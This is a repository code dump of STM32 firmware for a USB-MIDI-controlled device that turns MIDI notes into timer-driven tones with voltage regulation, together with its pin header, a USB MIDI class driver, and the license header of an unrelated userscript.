* SHALL STMICROELECTRONICS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
* OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
* EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
******************************************************************************
*/
/* Includes ------------------------------------------------------------------*/
#include "main.h"
#include "stm32f0xx_hal.h"
#include "usb_device.h"
/* USER CODE BEGIN Includes */
#include "device_conf.h"
#include "curemisc.h"
#include "curebuffer.h"
#include "usbd_midi_if.h"
#include "math.h"
/* USER CODE END Includes */
/* Private variables ---------------------------------------------------------*/
TIM_HandleTypeDef htim14;
TIM_HandleTypeDef htim15;
TIM_HandleTypeDef htim17;
TIM_HandleTypeDef htim2;
TIM_HandleTypeDef htim1;
DAC_HandleTypeDef hdac;
ADC_HandleTypeDef hadc;
DMA_HandleTypeDef hdma_adc;
uint16_t adcBuffer[3];
uint8_t uart_tx_dat;
/* USER CODE END PV */
/* Private function prototypes -----------------------------------------------*/
void SystemClock_Config(void);
static void MX_GPIO_Init(void);
static void MX_TIM14_Init(void);
static void MX_TIM15_Init(void);
static void MX_TIM17_Init(void);
static void USER_TIM2_Init(void);
static void USER_TIM1_Init(void);
static void MX_DAC_Init(void);
static void MX_DMA_Init(void);
static void MX_ADC_Init(void);
void htim17_update(void);
uint32_t Vout = 0;
uint16_t Iout = 0;
uint32_t Vset = 0;
uint32_t Vmax = 52000;
void htim17_update() {
Iout = adcBuffer[0] * 1.33f;
Vout = adcBuffer[1] * 16.6f;
int32_t error = Vset - Vout;
TIM1->CCR1 = CLAMP(error / 3, 0, 500);
if (Vout > 55000) {
TIM1->CCR1 = 0;
}
}
/* USER CODE BEGIN PFP */
/* Private function prototypes -----------------------------------------------*/
void dfu_otter_bootloader(void)
{
*((unsigned long *)0x20003FF0) = 0xDEADBEEF;
NVIC_SystemReset();
}
/* USER CODE END PFP */
/* USER CODE BEGIN 0 */
uint32_t curPeriode0 = 0;
uint32_t curPeriode1 = 0;
void HAL_TIM_PeriodElapsedCallback(TIM_HandleTypeDef *htim)
{
if(htim->Instance == TIM14)
{
//HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
if (TIM2->CNT == 0) {
TIM2->ARR = (uint32_t)(curPeriode0 / CLAMP(((Iout/200)-10), 3, 16)); // Play first channel
TIM2->CR1 = TIM2->CR1 | 1;
}
}
if(htim->Instance == TIM15)
{
//HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
if (TIM2->CNT == 0) {
TIM2->ARR = (uint32_t)(curPeriode1 / 8); // Play second channel with less power
TIM2->CR1 = TIM2->CR1 | 1;
}
}
}
/**
* @brief The application entry point.
*
* @retval None
*/
uint8_t midiBuffer[4];
uint8_t midiState = 0;
uint16_t curTone0 = 0;
uint16_t curTone1 = 0;
uint16_t curChannel = 0;
uint16_t lastTone0 = 0;
uint16_t lastTone1 = 0;
uint32_t noteTimeout = 0;
uint16_t freqs[16] = {0};
int main(void)
{
/* USER CODE BEGIN 1 */
/* USER CODE END 1 */
/* MCU Configuration----------------------------------------------------------*/
/* Reset of all peripherals, Initializes the Flash interface and the Systick. */
HAL_Init();
/* USER CODE BEGIN Init */
/* USER CODE END Init */
/* Configure the system clock */
SystemClock_Config();
/* USER CODE BEGIN SysInit */
/* USER CODE END SysInit */
/* Initialize all configured peripherals */
MX_GPIO_Init();
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, SET);
MX_DAC_Init();
HAL_DAC_Start(&hdac, DAC_CHANNEL_1);
HAL_DAC_SetValue(&hdac, DAC_CHANNEL_1, DAC_ALIGN_12B_R, 2048);
MX_TIM14_Init();
HAL_TIM_Base_Start_IT(&htim14);
TIM14->CR1 &= ~(1UL);
MX_TIM15_Init();
HAL_TIM_Base_Start_IT(&htim15);
TIM15->CR1 &= ~(1UL);
MX_DMA_Init();
MX_ADC_Init();
HAL_ADC_Start_DMA(&hadc, (uint32_t*)adcBuffer, 3);
USER_TIM1_Init();
//HAL_TIM_PWM_Start(&htim1);
HAL_TIM_PWM_Start_IT(&htim1, TIM_CHANNEL_1);
//__HAL_TIM_SET_COMPARE(&htim1, TIM_CHANNEL_1, 1000);
USER_TIM2_Init();
HAL_TIM_Base_Start(&htim2);
HAL_TIM_OnePulse_Start(&htim2, TIM_CHANNEL_2);
/* USER CODE BEGIN 2 */
//USB-MIDI Init
MX_USB_MIDI_INIT();
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
if(FUNC_ERROR == midiInit() ){
while(1){
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_Delay(500);
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
HAL_Delay(500);
}
}
//Wait usb configuration.
while(1){
if(USBD_STATE_CONFIGURED == hUsbDeviceFS.dev_state){
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
break;
}else{
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
}
}
MX_TIM17_Init();
HAL_TIM_Base_Start_IT(&htim17);
for (uint32_t i = 0; i < Vmax; i+=100) {
Vset = i;
HAL_Delay(3);
}
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
Vset = Vmax;
while (1)
{
//Wait USB configuration when USB connection error has occurred.
while(1){
//HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
if(USBD_STATE_CONFIGURED == hUsbDeviceFS.dev_state){
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
break;
}else{
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, SET);
HAL_Delay(200);
HAL_GPIO_WritePin(LED_POW_GPIO, LED_POW_PIN, RESET);
HAL_Delay(200);
}
}
if (HAL_GPIO_ReadPin(BUTTON_GPIO, BUTTON_PIN)) {
dfu_otter_bootloader();
}
curTone0 = 0;
curTone1 = 0;
for( int i = 0; i < 16; i++ ) { // find max pitch from all channels
if( freqs[i] > curTone0 ) {
curTone1 = curTone0;
curTone0 = freqs[i];
}
else if( freqs[i] > curTone1 ) {
curTone1 = freqs[i];
}
}
if (curTone0 > 20 && curTone0 != lastTone0) { // play one tone using TIM14
curPeriode0 = (uint32_t)1000000 / (uint32_t)(curTone0);
TIM14->CNT = 0;
TIM14->ARR = curPeriode0;
TIM14->CR1 = TIM14->CR1 | 1;
lastTone0 = curTone0;
noteTimeout = HAL_GetTick();
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, SET);
} else if (curTone0 < 20 && curTone0 != lastTone0) {
TIM14->CR1 &= ~(1UL);
curPeriode0 = 0;
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
}
if (curTone1 > 20 && curTone1 != lastTone1) { // play other polyphonic tone ussing TIM15
curPeriode1 = (uint32_t)1000000 / (uint32_t)(curTone1);
TIM15->CNT = 0;
TIM15->ARR = curPeriode1;
TIM15->CR1 = TIM15->CR1 | 1;
lastTone1 = curTone1;
noteTimeout = HAL_GetTick();
} else if (curTone1 < 20 && curTone1 != lastTone1) {
TIM15->CR1 &= ~(1UL);
curPeriode1 = 0;
}
if ((HAL_GetTick() - noteTimeout) > 1000) {
TIM14->CR1 &= ~(1UL);
TIM15->CR1 &= ~(1UL);
for (int i = 0; i < 16; i++) {
freqs[i] = 0;
}
HAL_GPIO_WritePin(LED_FAULT_GPIO, LED_FAULT_PIN, RESET);
}
//[USB-MIDI IN] to [MIDI JACK OUT]
if( FUNC_SUCCESS == midiGetFromUsbRx(0, &uart_tx_dat)){
if (uart_tx_dat >> 7 == 1) {
midiBuffer[0] = uart_tx_dat;
midiBuffer[1] = 0;
midiBuffer[2] = 0;
midiState = 1;
} else if (midiState == 1) {
midiBuffer[1] = uart_tx_dat;
midiState = 2;
} else if (midiState == 2) {
midiBuffer[2] = uart_tx_dat;
midiState = 3;
if ((midiBuffer[0] & 0xF0) == 0x90) { // Note on, 2 data bytes
char key = midiBuffer[1];
char vel = midiBuffer[2];
uint16_t freq = pow(2,(key-0x45)/12.0)*440.0;
curChannel = midiBuffer[0] & 0xF;
// Note on with a velocity of 0x00 is the same as a note off message. MIDI Spec:
// "A receiver must be capable of recognizing either method of turning off a note, and should treat them identically."
if (vel == 0) {
if (freqs[curChannel] == freq)
freqs[curChannel] = 0;
} else {
freqs[curChannel] = freq;
}
}
if ((midiBuffer[0] & 0xF0) == 0x80) { // Note off, 2 data bytes
char key = midiBuffer[1];
char vel = midiBuffer[2];
uint16_t freq = pow(2,(key-0x45)/12.0)*440.0;
//if (freqs[midiBuffer[0] & 0xF] == freq) {
freqs[midiBuffer[0] & 0xF] = 0;
//}
}
}
}
//[MIDI JACK IN] to [USB-MIDI OUT]
//midiProcess();
}
/* USER CODE END 3 */
}
/** System Clock Configuration
*/
void SystemClock_Config(void)
{
RCC_OscInitTypeDef RCC_OscInitStruct;
RCC_ClkInitTypeDef RCC_ClkInitStruct;
RCC_PeriphCLKInitTypeDef PeriphClkInit;
/**Initializes the CPU, AHB and APB busses clocks
*/
RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_HSI14|RCC_OSCILLATORTYPE_HSI48;
RCC_OscInitStruct.HSI48State = RCC_HSI48_ON;
RCC_OscInitStruct.HSI14State = RCC_HSI14_ON;
RCC_OscInitStruct.HSI14CalibrationValue = 16;
RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE;
if (HAL_RCC_OscConfig(&RCC_OscInitStruct) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Initializes the CPU, AHB and APB busses clocks
*/
RCC_ClkInitStruct.ClockType = RCC_CLOCKTYPE_HCLK|RCC_CLOCKTYPE_SYSCLK
|RCC_CLOCKTYPE_PCLK1;
RCC_ClkInitStruct.SYSCLKSource = RCC_SYSCLKSOURCE_HSI48;
RCC_ClkInitStruct.AHBCLKDivider = RCC_SYSCLK_DIV1;
RCC_ClkInitStruct.APB1CLKDivider = RCC_HCLK_DIV1;
if (HAL_RCC_ClockConfig(&RCC_ClkInitStruct, FLASH_LATENCY_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
PeriphClkInit.PeriphClockSelection = RCC_PERIPHCLK_USB;
PeriphClkInit.UsbClockSelection = RCC_USBCLKSOURCE_HSI48;
if (HAL_RCCEx_PeriphCLKConfig(&PeriphClkInit) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure the Systick interrupt time
*/
HAL_SYSTICK_Config(HAL_RCC_GetHCLKFreq()/1000);
/**Configure the Systick
*/
HAL_SYSTICK_CLKSourceConfig(SYSTICK_CLKSOURCE_HCLK);
/* SysTick_IRQn interrupt configuration */
HAL_NVIC_SetPriority(SysTick_IRQn, 0, 0);
}
/* ADC init function */
static void MX_ADC_Init(void)
{
__HAL_RCC_ADC1_CLK_ENABLE();
ADC_ChannelConfTypeDef sConfig;
/**Configure the global features of the ADC (Clock, Resolution, Data Alignment and number of conversion)
*/
hadc.Instance = ADC1;
hadc.Init.ClockPrescaler = ADC_CLOCK_ASYNC_DIV1;
hadc.Init.Resolution = ADC_RESOLUTION_12B;
hadc.Init.DataAlign = ADC_DATAALIGN_RIGHT;
hadc.Init.ScanConvMode = ADC_SCAN_DIRECTION_FORWARD;
hadc.Init.EOCSelection = ADC_EOC_SEQ_CONV;
hadc.Init.LowPowerAutoWait = DISABLE;
hadc.Init.LowPowerAutoPowerOff = DISABLE;
hadc.Init.ContinuousConvMode = DISABLE;
hadc.Init.DiscontinuousConvMode = DISABLE;
hadc.Init.ExternalTrigConv = ADC_EXTERNALTRIGCONV_T1_TRGO;
hadc.Init.ExternalTrigConvEdge = ADC_EXTERNALTRIGCONVEDGE_RISING;
hadc.Init.DMAContinuousRequests = ENABLE;
hadc.Init.Overrun = ADC_OVR_DATA_PRESERVED;
if (HAL_ADC_Init(&hadc) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_0;
sConfig.Rank = ADC_RANK_CHANNEL_NUMBER;
sConfig.SamplingTime = ADC_SAMPLETIME_28CYCLES_5;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_1;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**Configure for the selected ADC regular channel to be converted.
*/
sConfig.Channel = ADC_CHANNEL_2;
if (HAL_ADC_ConfigChannel(&hadc, &sConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/**
* Enable DMA controller clock
*/
static void MX_DMA_Init(void)
{
/* DMA controller clock enable */
__HAL_RCC_DMA1_CLK_ENABLE();
/* DMA interrupt init */
/* DMA1_Channel1_IRQn interrupt configuration */
HAL_NVIC_SetPriority(DMA1_Channel1_IRQn, 0, 0);
HAL_NVIC_EnableIRQ(DMA1_Channel1_IRQn);
}
/* TIM14 init function */
static void MX_TIM14_Init(void)
{
htim14.Instance = TIM14;
htim14.Init.Prescaler = 11;
htim14.Init.CounterMode = TIM_COUNTERMODE_UP;
htim14.Init.Period = 1000;
htim14.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim14.Init.RepetitionCounter = 0;
htim14.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE;
if (HAL_TIM_Base_Init(&htim14) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/* TIM15 init function */
static void MX_TIM15_Init(void)
{
htim15.Instance = TIM15;
htim15.Init.Prescaler = 11;
htim15.Init.CounterMode = TIM_COUNTERMODE_UP;
htim15.Init.Period = 1000;
htim15.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim15.Init.RepetitionCounter = 0;
htim15.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_DISABLE;
if (HAL_TIM_Base_Init(&htim15) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/* TIM17 init function */
static void MX_TIM17_Init(void)
{
htim17.Instance = TIM17;
htim17.Init.Prescaler = 11;
htim17.Init.CounterMode = TIM_COUNTERMODE_UP;
htim17.Init.Period = 1000;
htim17.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
htim17.Init.RepetitionCounter = 0;
htim17.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_ENABLE;
if (HAL_TIM_Base_Init(&htim17) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
static void USER_TIM2_Init(void) {
__HAL_RCC_TIM2_CLK_ENABLE();
TIM_ClockConfigTypeDef sClockSourceConfig;
TIM_MasterConfigTypeDef sMasterConfig;
TIM_OC_InitTypeDef sConfigOC;
htim2.Instance = TIM2;
htim2.Init.Prescaler = 0;
htim2.Init.CounterMode = TIM_COUNTERMODE_UP;
htim2.Init.Period = 3200;
htim2.Init.ClockDivision = TIM_CLOCKDIVISION_DIV4;
HAL_TIM_Base_Init(&htim2);
sMasterConfig.MasterOutputTrigger = TIM_TRGO_RESET;
sMasterConfig.MasterSlaveMode = TIM_MASTERSLAVEMODE_DISABLE;
HAL_TIMEx_MasterConfigSynchronization(&htim2, &sMasterConfig);
sConfigOC.OCMode = TIM_OCMODE_PWM1;
sConfigOC.Pulse = 1;
sConfigOC.OCPolarity = TIM_OCPOLARITY_LOW;
sConfigOC.OCFastMode = TIM_OCFAST_DISABLE;
HAL_TIM_PWM_ConfigChannel(&htim2, &sConfigOC, TIM_CHANNEL_2);
HAL_TIM_OnePulse_Init(&htim2, TIM_OPMODE_SINGLE);
HAL_TIM_MspPostInit(&htim2);
}
static void USER_TIM1_Init(void)
{
__HAL_RCC_TIM1_CLK_ENABLE();
TIM_MasterConfigTypeDef sMasterConfig;
TIM_OC_InitTypeDef sConfigOC;
TIM_BreakDeadTimeConfigTypeDef sBreakDeadTimeConfig;
htim1.Instance = TIM1;
htim1.Init.Prescaler = 0;
htim1.Init.CounterMode = TIM_COUNTERMODE_UP;
htim1.Init.Period = 1024;
htim1.Init.ClockDivision = TIM_CLOCKDIVISION_DIV2;
htim1.Init.RepetitionCounter = 0;
htim1.Init.AutoReloadPreload = TIM_AUTORELOAD_PRELOAD_ENABLE;
if (HAL_TIM_PWM_Init(&htim1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sMasterConfig.MasterOutputTrigger = TIM_TRGO_UPDATE;
sMasterConfig.MasterSlaveMode = TIM_MASTERSLAVEMODE_DISABLE;
if (HAL_TIMEx_MasterConfigSynchronization(&htim1, &sMasterConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sConfigOC.OCMode = TIM_OCMODE_PWM1;
sConfigOC.Pulse = 0;
sConfigOC.OCPolarity = TIM_OCPOLARITY_HIGH;
sConfigOC.OCNPolarity = TIM_OCNPOLARITY_HIGH;
sConfigOC.OCFastMode = TIM_OCFAST_DISABLE;
sConfigOC.OCIdleState = TIM_OCIDLESTATE_RESET;
sConfigOC.OCNIdleState = TIM_OCNIDLESTATE_RESET;
if (HAL_TIM_PWM_ConfigChannel(&htim1, &sConfigOC, TIM_CHANNEL_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
sBreakDeadTimeConfig.OffStateRunMode = TIM_OSSR_DISABLE;
sBreakDeadTimeConfig.OffStateIDLEMode = TIM_OSSI_DISABLE;
sBreakDeadTimeConfig.LockLevel = TIM_LOCKLEVEL_OFF;
sBreakDeadTimeConfig.DeadTime = 0;
sBreakDeadTimeConfig.BreakState = TIM_BREAK_DISABLE;
sBreakDeadTimeConfig.BreakPolarity = TIM_BREAKPOLARITY_HIGH;
sBreakDeadTimeConfig.AutomaticOutput = TIM_AUTOMATICOUTPUT_DISABLE;
if (HAL_TIMEx_ConfigBreakDeadTime(&htim1, &sBreakDeadTimeConfig) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
HAL_TIM_MspPostInit(&htim1);
}
/* DAC init function */
static void MX_DAC_Init(void)
{
DAC_ChannelConfTypeDef sConfig;
/**DAC Initialization
*/
hdac.Instance = DAC;
if (HAL_DAC_Init(&hdac) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
/**DAC channel OUT1 config
*/
sConfig.DAC_Trigger = DAC_TRIGGER_NONE;
sConfig.DAC_OutputBuffer = DAC_OUTPUTBUFFER_ENABLE;
if (HAL_DAC_ConfigChannel(&hdac, &sConfig, DAC_CHANNEL_1) != HAL_OK)
{
_Error_Handler(__FILE__, __LINE__);
}
}
/**
* Enable DMA controller clock
*/
/** Configure pins as
* Analog
* Input
* Output
* EVENT_OUT
* EXTI
*/
static void MX_GPIO_Init(void)
{
GPIO_InitTypeDef GPIO_InitStruct;
/* GPIO Ports Clock Enable */
__HAL_RCC_GPIOF_CLK_ENABLE();
__HAL_RCC_GPIOA_CLK_ENABLE();
__HAL_RCC_GPIOB_CLK_ENABLE();
/*Configure GPIO pin Output Level */
HAL_GPIO_WritePin(GPIOA, GPIO_PIN_10|GPIO_PIN_15, GPIO_PIN_RESET);
/*Configure GPIO pins : PA4 PA5 PA6 PA7 */
GPIO_InitStruct.Pin = GPIO_PIN_10|GPIO_PIN_15;
GPIO_InitStruct.Mode = GPIO_MODE_OUTPUT_PP;
GPIO_InitStruct.Pull = GPIO_NOPULL;
GPIO_InitStruct.Speed = GPIO_SPEED_FREQ_LOW;
HAL_GPIO_Init(GPIOA, &GPIO_InitStruct);
}
/* USER CODE BEGIN 4 */
/* USER CODE END 4 */
/**
* @brief This function is executed in case of error occurrence.
* @param file: The file name as string.
* @param line: The line in file as a number.
* @retval None
*/
void _Error_Handler(char *file, int line)
{
/* USER CODE BEGIN Error_Handler_Debug */
/* User can add his own implementation to report the HAL error return state */
while(1)
{
}
/* USER CODE END Error_Handler_Debug */
}
#ifdef USE_FULL_ASSERT
/**
* @brief Reports the name of the source file and the source line number
* where the assert_param error has occurred.
* @param file: pointer to the source file name
* @param line: assert_param error line source number
* @retval None
*/
void assert_failed(uint8_t* file, uint32_t line)
{
/* USER CODE BEGIN 6 */
/* User can add his own implementation to report the file name and line number,
ex: printf("Wrong parameters value: file %s on line %d\r\n", file, line) */
/* USER CODE END 6 */
}
#endif /* USE_FULL_ASSERT */
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
<|start_filename|>software/Inc/device_conf.h<|end_filename|>
/*
* device_conf.h
*
* Created on: 2018/07/03
* Author: Keshikan
*/
#ifndef DEVICE_CONF_H_
#define DEVICE_CONF_H_
#define LED_POW_GPIO GPIOA
#define LED_POW_PIN GPIO_PIN_15
#define LED_FAULT_GPIO GPIOA
#define LED_FAULT_PIN GPIO_PIN_10
#define BUTTON_GPIO GPIOA
#define BUTTON_PIN GPIO_PIN_7
#endif /* DEVICE_CONF_H_ */
<|start_filename|>software/Middlewares/USBMIDI/Src/usbd_midi.c<|end_filename|>
/**
******************************************************************************
* @file usbd_midi.c
******************************************************************************
(CC at)2016 by D.F.Mac. @TripArts Music
*/
/* Includes ------------------------------------------------------------------*/
#include "usbd_midi.h"
#include "usbd_desc.h"
#include "stm32f0xx_hal_conf.h"
#include "usbd_ctlreq.h"
#include "stm32f0xx_hal.h"
static uint8_t USBD_MIDI_Init (USBD_HandleTypeDef *pdev, uint8_t cfgidx);
static uint8_t USBD_MIDI_DeInit (USBD_HandleTypeDef *pdev, uint8_t cfgidx);
static uint8_t USBD_MIDI_DataIn (USBD_HandleTypeDef *pdev, uint8_t epnum);
static uint8_t USBD_MIDI_DataOut (USBD_HandleTypeDef *pdev, uint8_t epnum);
static uint8_t *USBD_MIDI_GetCfgDesc (uint16_t *length);
//uint8_t *USBD_MIDI_GetDeviceQualifierDescriptor (uint16_t *length);
USBD_HandleTypeDef *pInstance = NULL;
uint32_t APP_Rx_ptr_in = 0;
uint32_t APP_Rx_ptr_out = 0;
uint32_t APP_Rx_length = 0;
uint8_t USB_Tx_State = 0;
__ALIGN_BEGIN uint8_t USB_Rx_Buffer[MIDI_DATA_OUT_PACKET_SIZE] __ALIGN_END ;
__ALIGN_BEGIN uint8_t APP_Rx_Buffer[APP_RX_DATA_SIZE] __ALIGN_END ;
/* USB Standard Device Descriptor */
/*
__ALIGN_BEGIN static uint8_t USBD_MIDI_DeviceQualifierDesc[USB_LEN_DEV_QUALIFIER_DESC] __ALIGN_END =
{
USB_LEN_DEV_QUALIFIER_DESC,
USB_DESC_TYPE_DEVICE_QUALIFIER,
0x00,
0x02,
0x00,
0x00,
0x00,
0x40,
0x01,
0x00,
};
*/
/* USB MIDI interface class callbacks structure */
USBD_ClassTypeDef USBD_MIDI =
{
USBD_MIDI_Init,
USBD_MIDI_DeInit,
NULL,
NULL,
NULL,
USBD_MIDI_DataIn,
USBD_MIDI_DataOut,
NULL,
NULL,
NULL,
NULL,// HS
USBD_MIDI_GetCfgDesc,// FS
NULL,// OTHER SPEED
NULL,// DEVICE_QUALIFIER
};
/* USB MIDI device Configuration Descriptor */
__ALIGN_BEGIN uint8_t USBD_MIDI_CfgDesc[USB_MIDI_CONFIG_DESC_SIZ] __ALIGN_END =
{
// configuration descriptor
0x09, 0x02, 0x65 + 6+6+9+9+1+1, 0x00, 0x02, 0x01, 0x00, 0x80, 0x0A,
// The Audio Interface Collection
0x09, 0x04, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, // Standard AC Interface Descriptor
0x09, 0x24, 0x01, 0x00, 0x01, 0x09, 0x00, 0x01, 0x01, // Class-specific AC Interface Descriptor
0x09, 0x04, 0x01, 0x00, 0x02, 0x01, 0x03, 0x00, 0x00, // MIDIStreaming Interface Descriptors
0x07, 0x24, 0x01, 0x00, 0x01, 0x25 + 6+6+9+9, 0x00, // Class-Specific MS Interface Header Descriptor
// MIDI IN JACKS
0x06, 0x24, 0x02, 0x01, 0x01, 0x00,//MIDI-IN 1 (embedded)
0x06, 0x24, 0x02, 0x02, 0x02, 0x00,//MIDI-IN 1 (external)
0x06, 0x24, 0x02, 0x01, 0x11, 0x00,//MIDI-IN 2 (embedded)
0x06, 0x24, 0x02, 0x02, 0x12, 0x00,//MIDI-IN 2 (external)
// MIDI OUT JACKS
0x09, 0x24, 0x03, 0x01, 0x03, 0x01, 0x02, 0x01, 0x00,//MIDI-OUT 1 (embedded)
0x09, 0x24, 0x03, 0x02, 0x04, 0x01, 0x01, 0x01, 0x00,//MIDI-OUT 1 (external)
0x09, 0x24, 0x03, 0x01, 0x13, 0x01, 0x12, 0x01, 0x00,//MIDI-OUT 2 (embedded)
0x09, 0x24, 0x03, 0x02, 0x14, 0x01, 0x11, 0x01, 0x00,//MIDI-OUT 2 (external)
// OUT endpoint descriptor
0x09, 0x05, MIDI_OUT_EP, 0x02, 0x40, 0x00, 0x00, 0x00, 0x00,
0x06, 0x25, 0x01, 0x02, 0x01, 0x11,
// IN endpoint descriptor
0x09, 0x05, MIDI_IN_EP, 0x02, 0x40, 0x00, 0x00, 0x00, 0x00,
0x06, 0x25, 0x01, 0x02, 0x03, 0x13,
};
static uint8_t USBD_MIDI_Init(USBD_HandleTypeDef *pdev, uint8_t cfgidx){
pInstance = pdev;
USBD_LL_OpenEP(pdev,MIDI_IN_EP,USBD_EP_TYPE_BULK,MIDI_DATA_IN_PACKET_SIZE);
USBD_LL_OpenEP(pdev,MIDI_OUT_EP,USBD_EP_TYPE_BULK,MIDI_DATA_OUT_PACKET_SIZE);
USBD_LL_PrepareReceive(pdev,MIDI_OUT_EP,(uint8_t*)(USB_Rx_Buffer),MIDI_DATA_OUT_PACKET_SIZE);
return 0;
}
static uint8_t USBD_MIDI_DeInit (USBD_HandleTypeDef *pdev, uint8_t cfgidx){
pInstance = NULL;
USBD_LL_CloseEP(pdev,MIDI_IN_EP);
USBD_LL_CloseEP(pdev,MIDI_OUT_EP);
return 0;
}
static uint8_t USBD_MIDI_DataIn (USBD_HandleTypeDef *pdev, uint8_t epnum){
if (USB_Tx_State == 1){
USB_Tx_State = 0;
}
return USBD_OK;
}
static uint8_t USBD_MIDI_DataOut (USBD_HandleTypeDef *pdev, uint8_t epnum)
{
uint16_t USB_Rx_Cnt;
USBD_MIDI_ItfTypeDef *pmidi;
pmidi = (USBD_MIDI_ItfTypeDef *)(pdev->pUserData);
USB_Rx_Cnt = ((PCD_HandleTypeDef*)pdev->pData)->OUT_ep[epnum].xfer_count;
pmidi->pIf_MidiRx((uint8_t *)&USB_Rx_Buffer, USB_Rx_Cnt);
USBD_LL_PrepareReceive(pdev,MIDI_OUT_EP,(uint8_t*)(USB_Rx_Buffer),MIDI_DATA_OUT_PACKET_SIZE);
return USBD_OK;
}
void USBD_MIDI_SendPacket (){
uint16_t USB_Tx_ptr;
uint16_t USB_Tx_length;
if(USB_Tx_State != 1){
if (APP_Rx_ptr_out == APP_RX_DATA_SIZE){
APP_Rx_ptr_out = 0;
}
if(APP_Rx_ptr_out == APP_Rx_ptr_in){
USB_Tx_State = 0;
return;
}
if(APP_Rx_ptr_out > APP_Rx_ptr_in){
APP_Rx_length = APP_RX_DATA_SIZE - APP_Rx_ptr_out;
}else{
APP_Rx_length = APP_Rx_ptr_in - APP_Rx_ptr_out;
}
if (APP_Rx_length > MIDI_DATA_IN_PACKET_SIZE){
USB_Tx_ptr = APP_Rx_ptr_out;
USB_Tx_length = MIDI_DATA_IN_PACKET_SIZE;
APP_Rx_ptr_out += MIDI_DATA_IN_PACKET_SIZE;
APP_Rx_length -= MIDI_DATA_IN_PACKET_SIZE;
}else{
USB_Tx_ptr = APP_Rx_ptr_out;
USB_Tx_length = APP_Rx_length;
APP_Rx_ptr_out += APP_Rx_length;
APP_Rx_length = 0;
}
USB_Tx_State = 1;
USBD_LL_Transmit (pInstance, MIDI_IN_EP,(uint8_t*)&APP_Rx_Buffer[USB_Tx_ptr],USB_Tx_length);
}
}
static uint8_t *USBD_MIDI_GetCfgDesc (uint16_t *length){
*length = sizeof (USBD_MIDI_CfgDesc);
return USBD_MIDI_CfgDesc;
}
//uint8_t *USBD_MIDI_GetDeviceQualifierDescriptor (uint16_t *length){
// *length = sizeof (USBD_MIDI_DeviceQualifierDesc);
// return USBD_MIDI_DeviceQualifierDesc;
//}
uint8_t USBD_MIDI_RegisterInterface(USBD_HandleTypeDef *pdev, USBD_MIDI_ItfTypeDef *fops)
{
uint8_t ret = USBD_FAIL;
if(fops != NULL){
pdev->pUserData= fops;
ret = USBD_OK;
}
return ret;
}
| konosubakonoakua/pcbtc |
<|start_filename|>launcher.user.js<|end_filename|>
/*The MIT License (MIT)
Copyright (c) 2015 Apostolique
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
